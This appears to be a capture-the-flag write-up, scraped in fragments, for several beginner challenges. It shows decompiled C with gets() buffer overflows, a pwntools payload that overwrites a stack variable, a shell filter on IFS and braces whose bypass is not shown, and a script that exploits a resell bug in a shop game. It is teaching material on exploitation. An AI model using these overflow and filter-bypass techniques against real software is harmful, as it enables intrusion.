In function lockdown, flag will be printed while local_10 is not 0:
c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
voidlockdown(void){ char local_50 [64]; int local_10; local_10 = 0; puts("I made this really cool flag but Governor Hogan put it on lockdown"); puts("Can you convince him to give it to you?"); gets(local_50); if (local_10 == 0) { puts("I am no longer asking. Give me the flag!"); } else { flag_me(); } return; }
and here is a buffer overflow obviously:
c
1
gets(local_50);
layout of satck: local_50[64] | local_10
local_10 will be overwrite with the values after 64 bytes of our input string.
Solution
Overwrite local_10 with nonzero values by buffer overflow:
python
1 2 3
offset = 65 payload = 'A'*offset sla('Can you convince him to give it to you?\n',payload)
buffer overflow while gets(song) in get_audition_info:
c
1 2 3 4 5 6 7 8
voidget_audition_info(){ char name[50]; char song[50]; printf("What's your name?\n"); gets(name); printf("What song will you be singing?\n"); gets(song); }
and we can print flag by calling audition(1200,366):
while [ 1 ] do read -p 'nash> ' input echo$input | sed 's/ //g' | sed 's/{//g'| sed 's/}//g' | sed 's/IFS//g' | sed 's/(//g' | sed 's/)//g' | /bin/bash done
We can see IFS,{,},( and ) in our input were filtered, so cat$IFSflag.txt or cat${IFS}flag.txt doesn’t work.
Timmy: Welcome! How can I help you today? 1. I want to sell 2. What's for sale? 3. See you later.
I want to sell
list of I want to sell:
Code
1 2 3 4 5 6 7 8
Choice: 1
Of course! What exactly are you offering? 1. flimsy axe - chop chop chop Price: 800 bells 2. olive flounder - it's looking at me funny Price: 800 bells 3. slingshot - the closest thing you can get to a gun Price: 900 bells 4. flimsy shovel - for digging yourself out of debt Price: 800 bells
and the item in list was disappeared after sell:
Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
3
Timmy: A slingshot! Sure! How about if I offer you 900 Bells? Thank you! Please come again!
1. I want to sell 2. What's for sale? 3. See you later. Choice: 1
Of course! What exactly are you offering? 1. flimsy axe - chop chop chop Price: 800 bells 2. olive flounder - it's looking at me funny Price: 800 bells 4. flimsy shovel - for digging yourself out of debt Price: 800 bells
What’s for sale?
list of What's for sale?:
Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Timmy: Welcome! How can I help you today? 1. I want to sell 2. What's for sale? 3. See you later. Choice: 2
8500 bells Timmy: Here's what we have to sell today. 1. flimsy net - 400 bells 2. tarantula - 8000 bells 3. slingshot - 900 bells 4. sapling - 640 bells 5. cherry - 400 bells 6. flag - 420000 bells
show money after choose 2
We don’t have enough money to purchase flag, but we can buy tarantula.
tarantula was added to list of I want to sell after we purchase it :
Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
2
Timmy: Excellent purchase! Yes, thank you for the bells 1. I want to sell 2. What's for sale? 3. See you later. Choice: 1
Of course! What exactly are you offering? 1. flimsy axe - chop chop chop Price: 800 bells 2. olive flounder - it's looking at me funny Price: 800 bells 3. slingshot - the closest thing you can get to a gun Price: 900 bells 4. flimsy shovel - for digging yourself out of debt Price: 800 bells 5. tarantula - I hate spiders! Price: 8000 bells
Timmy: Excellent purchase! Yes, thank you for the bells 1. I want to sell 2. What's for sale? 3. See you later. Choice: 1
Of course! What exactly are you offering? 1. flimsy axe - chop chop chop Price: 800 bells 2. olive flounder - it's looking at me funny Price: 800 bells 3. slingshot - the closest thing you can get to a gun Price: 900 bells 4. flimsy shovel - for digging yourself out of debt Price: 800 bells 5. tarantula - I hate spiders! Price: 8000 bells 5
Timmy: A tarantula! Sure! How about if I offer you 8000 Bells? Thank you! Please come again!
1. I want to sell 2. What's for sale? 3. See you later. Choice: 1
Of course! What exactly are you offering? 1. flimsy axe - chop chop chop Price: 800 bells 2. olive flounder - it's looking at me funny Price: 800 bells 3. slingshot - the closest thing you can get to a gun Price: 900 bells 4. flimsy shovel - for digging yourself out of debt Price: 800 bells 5. tarantula - I hate spiders! Price: 8000 bells
!!! tarantula was still in list of I want to sell after sold
so we can sell it for many times to earn enough money, then buy the flag
# sell tarantula 53 times - 8000*53=424000 for i in range(53): sla('Choice: ','1') sla('5. tarantula - I hate spiders! Price: 8000 bells\n','5') print i
# sell 1,2 (make room in pockets) sla('Choice: ','1') sla('5. tarantula - I hate spiders! Price: 8000 bells\n','2') sla('Choice: ','1') sla('5. tarantula - I hate spiders! Price: 8000 bells\n','1')
# buy flag sla('Choice: ','2') sla('6. flag - 420000 bells\n','6')
# print flag context.log_level = 'debug' sla('Choice: ','1')
